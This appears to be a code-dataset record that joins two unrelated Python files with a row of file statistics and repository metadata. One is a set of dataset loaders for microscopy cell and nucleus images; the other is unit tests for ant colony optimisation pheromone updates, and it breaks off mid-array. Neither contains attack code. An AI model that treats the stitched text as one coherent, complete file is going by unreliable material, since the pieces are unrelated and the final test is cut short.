# assert np.sum(image[:,:,0]) == 0 # First channel must be empty
height, width = image.shape[:2]
else:
height, width = self.INPUT_SHAPE
self.add_image(
"core",
image_id =i,
image_name=img_name,
path=image_path,
height=height,width=width)
def load_mask(self, image_id):
"""Generate instance gt for an image.
Returns:
gt: A bool array of shape [height, width, instance count] with
one mask per instance.
class_ids: a 1D array of class IDs of the instance gt.
"""
info = self.image_info[image_id]
img_name = info['image_name']
path_to_masks= self.dataset_dir+"/"+self.subset+"/gt/"+img_name
mask = []
for f in next(os.walk(path_to_masks))[2]:
if f.endswith(".png") and f.startswith("0_"):
m = skimage.io.imread(os.path.join(path_to_masks, f)).astype(np.bool)
mask.append(m)
mask = np.stack(mask, axis=-1)
# Return mask, and array of class IDs of each instance. Since we have
# one class ID, we return an array of ones
return mask, np.ones([mask.shape[-1]], dtype=np.int32)
def image_reference(self, image_id):
"""Return the path of the image."""
info = self.image_info[image_id]
if info["source"] == "core":
return info["path"]
else:
super(self.__class__, self).image_reference(image_id)
class CellsDataset(utils.Dataset):
"""
Contains only cores
"""
FIXED_INPUT_SHAPE = False
def load_image(self, image_id):
"""Load the specified image and return a [H,W,1] Numpy array.
"""
# Load image
image = skimage.io.imread(self.image_info[image_id]['path'])
assert image.ndim == 2 # Grayscale required
image = np.reshape(image,list(image.shape)+[1])
return image
def load_image_vis(self, image_id):
"""Load the specified image and return a [H,W,3] Numpy array.
Do not convert to one channel array (for visualization)
"""
image = skimage.io.imread(self.image_info[image_id]['path'])
assert image.ndim == 2
return image
def load_data(self, dataset_dir, subset):
self.add_class("cell", 1, "cell")
self.dataset_dir = dataset_dir
self.subset = subset
# Train or validation dataset?
assert subset in ["train", "val", ""]
image_dir = os.path.join(dataset_dir,subset,"images")
for i,img_name in enumerate(next(os.walk(image_dir))[1]):
image_path = os.path.join(image_dir,img_name,"1.png")
if not self.FIXED_INPUT_SHAPE:
image = skimage.io.imread(image_path)
assert np.sum(image[:,:,0]) == 0 # First channel must be empty
height, width = image.shape[:2]
else:
height, width = self.INPUT_SHAPE
self.add_image(
"cell",
image_id =i,
image_name=img_name,
path=image_path,
height=height,width=width)
def load_mask(self, image_id):
"""Generate instance gt for an image.
Returns:
gt: A bool array of shape [height, width, instance count] with
one mask per instance.
class_ids: a 1D array of class IDs of the instance gt.
"""
info = self.image_info[image_id]
img_name = info['image_name']
path_to_masks= self.dataset_dir+"/"+self.subset+"/gt/"+img_name
mask = []
for f in next(os.walk(path_to_masks))[2]:
if f.endswith(".png") and f.startswith("1_"):
m = skimage.io.imread(os.path.join(path_to_masks, f)).astype(np.bool)
mask.append(m)
mask = np.stack(mask, axis=-1)
# Return mask, and array of class IDs of each instance. Since we have
# one class ID, we return an array of ones
return mask, np.ones([mask.shape[-1]], dtype=np.int32)
def image_reference(self, image_id):
"""Return the path of the image."""
info = self.image_info[image_id]
if info["source"] == "cell":
return info["path"]
else:
super(self.__class__, self).image_reference(image_id)
class CellsWithCoresDataset(CoresDataset):
"""Extends CoreDataset with methods for loading cores and segmentation weights
"""
def load_core_image(self, image_id):
image = skimage.io.imread(self.image_info[image_id]['core_path'])
assert image.ndim == 2
image = np.reshape(image,list(image.shape)+[1])
return image
def load_core_image_vis(self, image_id):
image = skimage.io.imread(self.image_info[image_id]['core_path'])
assert image.ndim == 2
return image
def load_weight_image(self, image_id):
weights_path = os.path.join(self.dataset_dir, self.subset, "gt",
self.image_info[image_id]["image_name"], "weights","1_weights.pkl")
with gzip.open(weights_path, 'rb') as f:
weights = pkl.load(f, encoding='latin1') + 1.
# add single channel
weights = np.reshape(weights,list(weights.shape)+[1])
return weights
def load_mask(self, image_id):
"""Generate instance gt for an image.
Returns:
gt: A bool array of shape [height, width, instance count] with
one mask per instance.
class_ids: a 1D array of class IDs of the instance gt.
"""
# [height, width, instance_count]
info = self.image_info[image_id]
img_name = info['image_name']
path_to_masks= self.dataset_dir+"/"+self.subset+"/gt/"+img_name
mask = []
for f in next(os.walk(path_to_masks))[2]:
if f.endswith(".png") and f.startswith("1_"):
m = skimage.io.imread(os.path.join(path_to_masks, f)).astype(np.bool)
mask.append(m)
mask = np.stack(mask, axis=-1)
# Return mask, and array of class IDs of each instance. Since we have
# one class ID, we return an array of ones
return mask, np.ones([mask.shape[-1]], dtype=np.int32)
def load_data(self, dataset_dir, subset):
self.add_class("cell", 1, "cell")
self.dataset_dir = dataset_dir
self.subset = subset
# Train or validation dataset?
assert subset in ["train", "val", ""]
image_dir = os.path.join(dataset_dir,subset,"images")
for i,img_name in enumerate(next(os.walk(image_dir))[1]):
image_path = os.path.join(image_dir,img_name,"1.png")
core_path = os.path.join(image_dir,img_name,"0.png")
if not self.FIXED_INPUT_SHAPE:
image = skimage.io.imread(image_path)
# assert np.sum(image[:,:,0]) == 0 # First channel must be empty
height, width = image.shape[:2]
else:
height, width = self.INPUT_SHAPE
self.add_image(
"cell",
image_id=i,
image_name=img_name,
path=image_path,
core_path=core_path,
height=height,width=width)
def image_reference(self, image_id):
"""Return the path of the image."""
info = self.image_info[image_id]
if info["source"] == "cell":
return info["path"]
else:
super(self.__class__, self).image_reference(image_id)
class CoresDSB18Dataset(utils.Dataset):
"""Contains only cores
"""
def load_core_image(self, image_id):
image = skimage.io.imread(self.image_info[image_id]['core_path'])
# assert image.ndim == 2
image = rgb2gray(image)
image = np.reshape(image,list(image.shape)+[1])
return image
def load_core_image_vis(self, image_id):
image = skimage.io.imread(self.image_info[image_id]['core_path'])
#assert image.ndim == 2
return image
def load_image(self, image_id):
"""Load the specified image and return a [H,W,1] Numpy array.
"""
# Load image
image = skimage.io.imread(self.image_info[image_id]['path'])
# assert image.ndim == 2 # Grayscale required
image = rgb2gray(image)
image = np.reshape(image,list(image.shape)+[1])
return image
def load_image_vis(self, image_id):
"""Load the specified image and return a [H,W,3] Numpy array.
Do not convert to one channel array (for visualization)
"""
image = skimage.io.imread(self.image_info[image_id]['path'])
#assert image.ndim == 2
return image
def load_data(self, dataset_dir, subset):
self.add_class("core", 1, "core")
self.dataset_dir = dataset_dir
self.subset = subset
# Train or validation dataset?
assert subset in ["train", "val", "testeval", ""]
image_dir = os.path.join(dataset_dir,subset)
for i,img_name in enumerate(next(os.walk(image_dir))[1]):
image_path = os.path.join(image_dir,img_name,"images",img_name+".png")
core_path = image_path
if not self.FIXED_INPUT_SHAPE:
image = skimage.io.imread(image_path)
assert np.sum(image[:,:,0]) == 0 # First channel must be empty
height, width = image.shape[:2]
else:
height, width = self.INPUT_SHAPE
self.add_image(
"core",
image_id =i,
image_name=img_name,
path=image_path,
core_path=core_path,
height=height,width=width)
def load_mask(self, image_id):
"""Generate instance gt for an image.
Returns:
gt: A bool array of shape [height, width, instance count] with
one mask per instance.
class_ids: a 1D array of class IDs of the instance gt.
"""
info = self.image_info[image_id]
img_name = info['image_name']
path_to_masks= self.dataset_dir+"/"+self.subset+"/"+img_name+"/masks"
mask = []
for f in next(os.walk(path_to_masks))[2]:
if f.endswith(".png"):
m = skimage.io.imread(os.path.join(path_to_masks, f)).astype(np.bool)
mask.append(m)
mask = np.stack(mask, axis=-1)
# Return mask, and array of class IDs of each instance. Since we have
# one class ID, we return an array of ones
return mask, np.ones([mask.shape[-1]], dtype=np.int32)
def image_reference(self, image_id):
"""Return the path of the image."""
info = self.image_info[image_id]
if info["source"] == "core":
return info["path"]
else:
super(self.__class__, self).image_reference(image_id)
class Cells2ChannelDataset(utils.Dataset):
FIXED_INPUT_SHAPE = False
INPUT_SHAPE = [ 512, 512]
# img[:,:,1] = img_cell[:,:]
# img[:,:,2] = img_core[:,:]
# img[:,:,0] = 0
def load_image(self, image_id):
"""Load the specified image and return a [H,W,1] Numpy array.
"""
# Load image
image = skimage.io.imread(self.image_info[image_id]['path'])
assert image.ndim == 3 # rgb required
#image = np.reshape(image,list(image.shape)+[1])
image = image[:,:,[1,2]] # first channel should be black
assert image.shape[2] == 2
return image
def load_image_vis(self, image_id):
"""Load the specified image and return a [H,W,3] Numpy array.
Do not convert to one channel array (for visualization)
"""
image = skimage.io.imread(self.image_info[image_id]['path'])
#assert image.ndim == 2
return image
def load_data(self, dataset_dir, subset):
self.add_class("cell", 1, "cell")
self.dataset_dir = dataset_dir
self.subset = subset
# Train or validation dataset?
assert subset in ["train", "val", ""]
image_dir = os.path.join(dataset_dir,subset,"images")
for i,img_name in enumerate(next(os.walk(image_dir))[1]):
image_path = os.path.join(image_dir,img_name,"rgb.png")
if not self.FIXED_INPUT_SHAPE:
image = skimage.io.imread(image_path)
assert np.sum(image[:,:,0]) == 0 # First channel must be empty
height, width = image.shape[:2]
else:
height, width = self.INPUT_SHAPE
self.add_image(
"cell",
image_id =i,
image_name=img_name,
path=image_path,
height=height,width=width)
def load_mask(self, image_id):
"""Generate instance gt for an image.
Returns:
gt: A bool array of shape [height, width, instance count] with
one mask per instance.
class_ids: a 1D array of class IDs of the instance gt.
"""
info = self.image_info[image_id]
img_name = info['image_name']
path_to_masks= self.dataset_dir+"/"+self.subset+"/gt/"+img_name
mask = []
for f in next(os.walk(path_to_masks))[2]:
if f.endswith(".png") and f.startswith("1_"):
m = skimage.io.imread(os.path.join(path_to_masks, f)).astype(np.bool)
mask.append(m)
mask = np.stack(mask, axis=-1)
# Return mask, and array of class IDs of each instance. Since we have
# one class ID, we return an array of ones
return mask, np.ones([mask.shape[-1]], dtype=np.int32)
def image_reference(self, image_id):
"""Return the path of the image."""
info = self.image_info[image_id]
if info["source"] == "cell":
return info["path"]
else:
super(self.__class__, self).image_reference(image_id)
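# A minimal usage sketch (the dataset directory is hypothetical and must
# follow the <root>/<subset>/images/<name>/ layout expected above):
#
#   dataset = CellsWithCoresDataset()
#   dataset.load_data("/data/cells_and_cores", "train")
#   dataset.prepare()
#   image = dataset.load_image(dataset.image_ids[0])
#   core = dataset.load_core_image(dataset.image_ids[0])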
| 34.449505 | 103 | 0.587285 | 2,333 | 17,397 | 4.214745 | 0.099871 | 0.039866 | 0.02573 | 0.042103 | 0.81257 | 0.807587 | 0.804841 | 0.804841 | 0.804841 | 0.80057 | 0 | 0.014526 | 0.291659 | 17,397 | 504 | 104 | 34.517857 | 0.783413 | 0.225039 | 0 | 0.761589 | 0 | 0 | 0.046193 | 0 | 0 | 0 | 0 | 0 | 0.05298 | 1 | 0.092715 | false | 0 | 0.029801 | 0 | 0.327815 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
94ad9e1d811ff85e4d890486f842645de368f41c | 18,868 | py | Python | test/c_pheromone.py | FernandoGaGu/Ant-Colony-Optimisation | e1a1ee27f55c63c768964e80f38020f1aef664d7 | [
"BSD-3-Clause"
] | 1 | 2021-09-09T04:14:06.000Z | 2021-09-09T04:14:06.000Z | test/c_pheromone.py | FernandoGaGu/Ant-Colony-Optimisation | e1a1ee27f55c63c768964e80f38020f1aef664d7 | [
"BSD-3-Clause"
] | null | null | null | test/c_pheromone.py | FernandoGaGu/Ant-Colony-Optimisation | e1a1ee27f55c63c768964e80f38020f1aef664d7 | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
from copy import deepcopy
from antco import (
updateUndAS,
updateDirAS,
updateUndMMAS,
updateDirMMAS,
updateUndEliteMMAS,
updateDirEliteMMAS,
updateDirEliteAS,
updateUndEliteAS,
updateDirLocalPher,
updateUndLocalPher,
updateUndACS,
updateDirACS)
from antco import Ant
def test_directed_AS_update():
""" antco.pheromone.updateDirAS() unit testing """
np.random.seed(1997)
evaporation = 0.2
P_t0 = np.random.uniform(size=(4, 4)).astype(np.float64)
np.fill_diagonal(P_t0, 0)
P_t0 = (P_t0 + P_t0.T) / 2 # Symmetric matrix
paths = np.array([
# Ant 1
[[0, 1, 0, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 2
[[0, 1, 0, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 3
[[0, 0, 0, 1],
[0, 0, 0, 1],
[0, 0, 0, 1],
[1, 1, 1, 0]]], dtype=np.int8)
expected = np.array([
[0.0, 0.9267931249792329, 0.4776117072586296, 1.6791352931971335],
[0.9267931249792329, 0.0, 0.5591658434565883, 0.7150135839042728],
[0.4776117072586296, 0.5591658434565883, 0.0, 1.0865920636193305],
[1.6791352931971335, 0.7150135839042728, 1.0865920636193305, 0.0]], dtype=np.float64)
ant_scores = np.array([0.2, 0.3, 0.4], dtype=np.float64)
updateDirAS(paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, weight=1.0)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected, decimals=4)), \
'FAILED TEST: antco.pheromone.updateDirAS()'
print('SUCCESSFUL TEST: antco.pheromone.updateDirAS()')
def test_undirected_AS_update():
""" antco.pheromone.updateUndAS() unit testing """
np.random.seed(1997)
evaporation = 0.2
P_t0 = np.random.uniform(size=(4, 4)).astype(np.float64)
np.fill_diagonal(P_t0, 0)
P_t0 = (P_t0 + P_t0.T)/2 # Symmetric matrix
paths = np.array([
# Ant 1
[[0, 1, 0, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 2
[[0, 1, 0, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 3
[[0, 0, 0, 1],
[0, 0, 0, 1],
[0, 0, 0, 1],
[1, 1, 1, 0]]], dtype=np.int8)
expected = np.array([
[0.0, 0.9267931249792329, 0.4776117072586296, 1.6791352931971335],
[0.9267931249792329, 0.0, 0.5591658434565883, 0.7150135839042728],
[0.4776117072586296, 0.5591658434565883, 0.0, 1.0865920636193305],
[1.6791352931971335, 0.7150135839042728, 1.0865920636193305, 0.0]], dtype=np.float64)
ant_scores = np.array([0.2, 0.3, 0.4]).astype(np.float64)
updateUndAS(paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, weight=1.0)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected, decimals=4)), \
'FAILED TEST: antco.pheromone.updateUndAS()'
print('SUCCESSFUL TEST: antco.pheromone.updateUndAS()')
def test_directed_AS_elite_update():
""" antco.pheromone.updateDirEliteAS() unit testing """
np.random.seed(1997)
evaporation = 0.2
P_t0 = np.random.uniform(size=(4, 4)).astype(np.float64)
np.fill_diagonal(P_t0, 0)
P_t0 = (P_t0 + P_t0.T) / 2 # Symmetric matrix
paths = np.array([
# Ant 1
[[0, 1, 0, 1],
[1, 0, 0, 0],
[1, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 2
[[0, 1, 1, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 3
[[0, 0, 0, 1],
[0, 0, 0, 1],
[0, 0, 0, 1],
[1, 1, 1, 0]]], dtype=np.int8)
expected = np.array([
[0.0, 0.6414344987114436, 0.6820893643835099, 1.2433082310436099],
[0.6414344987114436, 0.0, 0.4473326730988265, 0.5720108649925117],
[0.3820893643835099, 0.4473326730988265, 0.0, 0.7692736491472838],
[1.2433082310436099, 0.5720108649925117, 0.7692736491472838, 0.0]],
dtype=np.float64)
ant_scores = np.array([0.2, 0.3, 0.4], dtype=np.float64)
updateDirEliteAS(
paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, elite=2, weight=1.0)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected, decimals=4)), \
        'FAILED TEST: antco.pheromone.updateDirEliteAS()'
print('SUCCESSFUL TEST: antco.pheromone.updateDirEliteAS()')
def test_undirected_AS_elite_update():
""" antco.pheromone.updateUndEliteAS() unit testing """
np.random.seed(1997)
evaporation = 0.2
P_t0 = np.random.uniform(size=(4, 4)).astype(np.float64)
np.fill_diagonal(P_t0, 0)
P_t0 = (P_t0 + P_t0.T)/2 # Symmetric matrix
paths = np.array([
# Ant 1
[[0, 1, 1, 1],
[1, 0, 0, 0],
[1, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 2
[[0, 1, 0, 1],
[1, 0, 1, 0],
[0, 1, 0, 1],
[1, 0, 1, 0]],
# Ant 3
[[0, 0, 0, 1],
[0, 0, 0, 1],
[0, 0, 0, 1],
[1, 1, 1, 0]]], dtype=np.int8)
expected = np.array([
[0.0, 0.6414344987114436, 0.3820893643835099, 1.2433082310436099],
[0.6414344987114436, 0.0, 0.7473326730988266, 0.5720108649925117],
[0.3820893643835099, 0.7473326730988266, 0.0, 0.7692736491472838],
[1.2433082310436099, 0.5720108649925117, 0.7692736491472838, 0.0]],
dtype=np.float64)
ant_scores = np.array([0.2, 0.3, 0.4]).astype(np.float64)
updateUndEliteAS(
paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, elite=2, weight=1.0)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected, decimals=4)), \
'FAILED TEST: antco.pheromone.updateUndEliteAS()'
print('SUCCESSFUL TEST: antco.pheromone.updateUndEliteAS()')
def test_directed_MMAS_update():
""" aco.pheromone.directed_mmas_update() unit testing """
np.random.seed(1997)
evaporation = 0.2
P_t0 = np.random.uniform(size=(4, 4)).astype(np.float64)
np.fill_diagonal(P_t0, 0)
P_t0 = (P_t0 + P_t0.T) / 2 # Symmetric matrix
paths = np.array([
# Ant 1
[[0, 1, 0, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 2
[[0, 1, 0, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 3
[[0, 0, 0, 1],
[0, 0, 0, 0],
[0, 0, 0, 1],
[1, 1, 1, 0]]], dtype=np.int8)
expected = np.array([
[0.0, 0.4267931249792329, 0.4776117072586296, 1.1791352931971335],
[0.4267931249792329, 0.0, 0.5591658434565883, 0.3150135839042728],
[0.4776117072586296, 0.5591658434565883, 0.0, 0.5865920636193305],
[1.1791352931971335, 0.7150135839042728, 0.5865920636193305, 0.0]], np.float64)
ant_scores = np.array([0.2, 0.3, 0.4], dtype=np.float64)
updateDirMMAS(
paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, limits=(0, 2), weight=1.0)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected, decimals=4)), \
'FAILED TEST: antco.pheromone.updateDirMMAS()'
expected2 = np.array([
[0.0, 0.34143449871144366, 0.3820893643835099, 1.1433082310436098],
[0.34143449871144366, 0.0, 0.4473326730988265, 0.2520108661846046],
[0.3820893643835099, 0.4473326730988265, 0.0, 0.6692736491472838],
[1.1433082310436098, 0.7720108649925117, 0.6692736491472838, 0.0]], np.float64)
updateDirMMAS(
paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, limits=(0, 2), weight=0.5)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected2, decimals=4)), \
'FAILED TEST: antco.pheromone.updateDirMMAS()'
print('SUCCESSFUL TEST: antco.pheromone.updateDirMMAS()')
def test_directed_MMAS_elite_update():
""" aco.pheromone.directed_mmas_elite_update() unit testing """
np.random.seed(1997)
evaporation = 0.2
P_t0 = np.random.uniform(size=(4, 4)).astype(np.float64)
np.fill_diagonal(P_t0, 0)
P_t0 = (P_t0 + P_t0.T) / 2 # Symmetric matrix
paths = np.array([
# Ant 1
[[0, 1, 0, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 2
[[0, 1, 1, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 3
[[0, 0, 0, 1],
[0, 0, 0, 0],
[0, 0, 0, 1],
[1, 1, 1, 0]]], dtype=np.int8)
expected = np.array([
[0.0, 0.6414344987114436, 0.6820893643835099, 1.2433082310436099],
[0.6414344987114436, 0.0, 0.4473326730988265, 0.2520108661846046],
[0.3820893643835099, 0.4473326730988265, 0.0, 0.7692736491472838],
[1.2433082310436099, 0.5720108649925117, 0.7692736491472838, 0.0]], np.float64)
ant_scores = np.array([0.2, 0.3, 0.4], dtype=np.float64)
updateDirEliteMMAS(
paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, limits=(0, 2), elite=2,
weight=1.0)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected, decimals=4)), \
'FAILED TEST: antco.pheromone.updateDirEliteMMAS()'
print('SUCCESSFUL TEST: antco.pheromone.updateDirEliteMMAS()')
def test_undirected_MMAS_update():
""" aco.pheromone.undirected_mmas_update() unit testing """
np.random.seed(1997)
evaporation = 0.2
P_t0 = np.random.uniform(size=(4, 4)).astype(np.float64)
np.fill_diagonal(P_t0, 0)
P_t0 = (P_t0 + P_t0.T) / 2 # Symmetric matrix
paths = np.array([
# Ant 1
[[0, 1, 0, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 2
[[0, 1, 0, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 3
[[0, 0, 0, 1],
[0, 0, 0, 1],
[0, 0, 0, 1],
[1, 1, 1, 0]]], dtype=np.int8)
expected = np.array([
[0.0, 0.4267931249792329, 0.4776117072586296, 1.1791352931971335],
[0.4267931249792329, 0.0, 0.5591658434565883, 0.7150135839042728],
[0.4776117072586296, 0.5591658434565883, 0.0, 0.5865920636193305],
[1.1791352931971335, 0.7150135839042728, 0.5865920636193305, 0.0]],
dtype=np.float64)
ant_scores = np.array([0.2, 0.3, 0.4], dtype=np.float64)
updateUndMMAS(
paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, limits=(0, 2), weight=1.0)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected, decimals=4)), \
'FAILED TEST: antco.pheromone.updateUndMMAS()'
expected2 = np.array([
[0.0, 0.34143449871144366, 0.3820893643835099, 1.1433082310436098],
[0.34143449871144366, 0.0, 0.4473326730988265, 0.7720108649925117],
[0.3820893643835099, 0.4473326730988265, 0.0, 0.6692736491472838],
[1.1433082310436098, 0.7720108649925117, 0.6692736491472838, 0.0]],
dtype=np.float64)
updateUndMMAS(
paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, limits=(0, 2), weight=0.5)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected2, decimals=4)), \
'FAILED TEST: antco.pheromone.updateUndMMAS()'
    print('SUCCESSFUL TEST: antco.pheromone.updateUndMMAS()')
def test_undirected_MMAS_elite_update():
""" antco.pheromone.updateUndEliteMMAS() unit testing """
np.random.seed(1997)
evaporation = 0.2
P_t0 = np.random.uniform(size=(4, 4)).astype(np.float64)
np.fill_diagonal(P_t0, 0)
P_t0 = (P_t0 + P_t0.T) / 2 # Symmetric matrix
paths = np.array([
# Ant 1
[[0, 1, 0, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 2
[[0, 1, 0, 1],
[1, 0, 1, 0],
[0, 1, 0, 1],
[1, 0, 1, 0]],
# Ant 3
[[0, 0, 0, 1],
[0, 0, 0, 1],
[0, 0, 0, 1],
[1, 1, 1, 0]]], dtype=np.int8)
expected = np.array([
[0.0, 0.6414344987114436, 0.3820893643835099, 1.2433082310436099],
[0.6414344987114436, 0.0, 0.7473326730988266, 0.5720108649925117],
[0.3820893643835099, 0.7473326730988266, 0.0, 0.7692736491472838],
[1.2433082310436099, 0.5720108649925117, 0.7692736491472838, 0.0]],
dtype=np.float64)
ant_scores = np.array([0.2, 0.3, 0.4], dtype=np.float64)
updateUndEliteMMAS(
paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, limits=(0, 2), elite=2, weight=1.0)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected, decimals=4)), \
'FAILED TEST: antco.pheromone.updateUndEliteMMAS()'
print('SUCCESSFUL TEST: antco.pheromone.updateUndEliteMMAS()')
def test_undirected_local_update():
    """ antco.pheromone.updateUndLocalPher() unit testing """
np.random.seed(1997)
decay = 0.2
init_val = 1.0
P = np.random.uniform(low=1.0, high=3.0, size=(4, 4)).astype(np.float64)
np.fill_diagonal(P, 0)
P = (P + P.T) / 2 # Symmetric matrix
P_t0 = deepcopy(P)
ant1 = Ant(l_min=0, l_max=5, graph_type='u'); ant1.initAdjMatrix(4)
ant2 = Ant(l_min=0, l_max=5, graph_type='u'); ant2.initAdjMatrix(4)
ant3 = Ant(l_min=0, l_max=5, graph_type='u'); ant3.initAdjMatrix(4)
ant1.visited_nodes = [0, 2, 3]
ant2.visited_nodes = [0, 1, 2]
ant3.visited_nodes = [3, 0, 2]
updateUndLocalPher(ant1, P, decay, init_val)
assert P_t0[0, 0] == P[0, 0], 'FAILED TEST: antco.pheromone.updateUndLocalPher()'
assert P_t0[2, 3] > P[2, 3], 'FAILED TEST: antco.pheromone.updateUndLocalPher()'
assert P_t0[3, 2] > P[3, 2], 'FAILED TEST: antco.pheromone.updateUndLocalPher()'
P_t0 = deepcopy(P)
updateUndLocalPher(ant2, P, decay, init_val)
assert P_t0[2, 3] == P[2, 3], 'FAILED TEST: antco.pheromone.updateUndLocalPher()'
assert P_t0[1, 2] > P[1, 2], 'FAILED TEST: antco.pheromone.updateUndLocalPher()'
assert P_t0[2, 1] > P[2, 1], 'FAILED TEST: antco.pheromone.updateUndLocalPher()'
P_t0 = deepcopy(P)
updateUndLocalPher(ant3, P, decay, init_val)
assert P_t0[1, 2] == P[1, 2], 'FAILED TEST: antco.pheromone.updateUndLocalPher()'
assert P_t0[0, 2] > P[0, 2], 'FAILED TEST: antco.pheromone.updateUndLocalPher()'
assert P_t0[2, 0] > P[2, 0], 'FAILED TEST: antco.pheromone.updateUndLocalPher()'
print('SUCCESSFUL TEST: antco.pheromone.updateUndLocalPher()')
def test_directed_local_update():
    """ antco.pheromone.updateDirLocalPher() unit testing """
np.random.seed(1997)
decay = 0.2
init_val = 1.0
P = np.random.uniform(low=1.0, high=3.0, size=(4, 4)).astype(np.float64)
np.fill_diagonal(P, 0)
P = (P + P.T) / 2 # Symmetric matrix
P_t0 = deepcopy(P)
ant1 = Ant(l_min=0, l_max=5, graph_type='d'); ant1.initAdjMatrix(4)
ant2 = Ant(l_min=0, l_max=5, graph_type='u'); ant2.initAdjMatrix(4)
ant3 = Ant(l_min=0, l_max=5, graph_type='u'); ant3.initAdjMatrix(4)
ant1.visited_nodes = [0, 2, 3]
ant2.visited_nodes = [0, 1, 2]
ant3.visited_nodes = [3, 0, 2]
updateDirLocalPher(ant1, P, decay, init_val)
assert P_t0[0, 0] == P[0, 0], 'FAILED TEST: antco.pheromone.updateDirLocalPher()'
assert P_t0[2, 3] > P[2, 3], 'FAILED TEST: antco.pheromone.updateDirLocalPher()'
assert P_t0[3, 2] == P[3, 2], 'FAILED TEST: antco.pheromone.updateDirLocalPher()'
P_t0 = deepcopy(P)
updateDirLocalPher(ant2, P, decay, init_val)
assert P_t0[2, 3] == P[2, 3], 'FAILED TEST: antco.pheromone.updateDirLocalPher()'
assert P_t0[1, 2] > P[1, 2], 'FAILED TEST: antco.pheromone.updateDirLocalPher()'
assert P_t0[2, 1] == P[2, 1], 'FAILED TEST: antco.pheromone.updateDirLocalPher()'
P_t0 = deepcopy(P)
updateDirLocalPher(ant3, P, decay, init_val)
assert P_t0[1, 2] == P[1, 2], 'FAILED TEST: antco.pheromone.updateDirLocalPher()'
assert P_t0[0, 2] > P[0, 2], 'FAILED TEST: antco.pheromone.updateDirLocalPher()'
assert P_t0[2, 0] == P[2, 0], 'FAILED TEST: antco.pheromone.updateDirLocalPher()'
print('SUCCESSFUL TEST: antco.pheromone.updateDirLocalPher()')
def test_undirected_ACS():
    """ antco.pheromone.updateUndACS() unit testing """
np.random.seed(1997)
evaporation = 0.2
P_t0 = np.random.uniform(size=(4, 4)).astype(np.float64)
np.fill_diagonal(P_t0, 0)
P_t0 = (P_t0 + P_t0.T) / 2 # Symmetric matrix
paths = np.array([
# Ant 1
[[0, 1, 0, 1],
[1, 0, 0, 0],
[0, 0, 0, 1],
[1, 0, 1, 0]],
# Ant 2
[[0, 1, 0, 1],
[1, 0, 1, 0],
[0, 1, 0, 1],
[1, 0, 1, 0]],
# Ant 3
[[0, 0, 0, 1],
[0, 0, 0, 1],
[0, 0, 0, 1],
[1, 1, 1, 0]]], dtype=np.int8)
expected = np.array([
[0.0, 0.5334914082114515, 0.5970146362973399, 1.1591352988595747],
[0.5334914082114515, 0.0, 0.6989573069245543, 0.695013589566714],
[0.5970146362973399, 0.6989573069245543, 0.0, 0.5665920692817716],
[1.1591352988595747, 0.695013589566714, 0.5665920692817716, 0.0]],
dtype=np.float64)
ant_scores = np.array([0.2, 0.3, 1.9], dtype=np.float64)
updateUndACS(paths=paths, P=P_t0, ant_scores=ant_scores, rho=evaporation, weight=1.0)
assert np.all(np.round(P_t0, decimals=4) == np.round(expected, decimals=4)), \
'FAILED TEST: antco.pheromone.updateUndACS()'
print('SUCCESSFUL TEST: antco.pheromone.updateUndACS()')
def test_directed_ACS():
    """ antco.pheromone.updateDirACS() unit testing """
np.random.seed(1997)
evaporation = 0.2
P_t0 = np.random.uniform(size=(4, 4)).astype(np.float64)
np.fill_diagonal(P_t0, 0)
P_t0 = (P_t0 + P_t0.T) / 2 # Symmetric matrix
paths = np.array([
# Ant 1
[[0, 1, 0, 1],
[0, 0, 0, 0],
[0, 0, 0, 1],
[0, 0, 0, 0]],
# Ant 2
[[0, 1, 0, 1],
[1, 0, 1, 0],
[0, 1, 0, 1],
[1, 0, 1, 0]],
# Ant 3
[[0, 0, 0, 1],
[0, 0, 0, 1],
[0, 0, 0, 1],
[1, 1, 1, 0]]], dtype=np.int8)
expected = np.array([
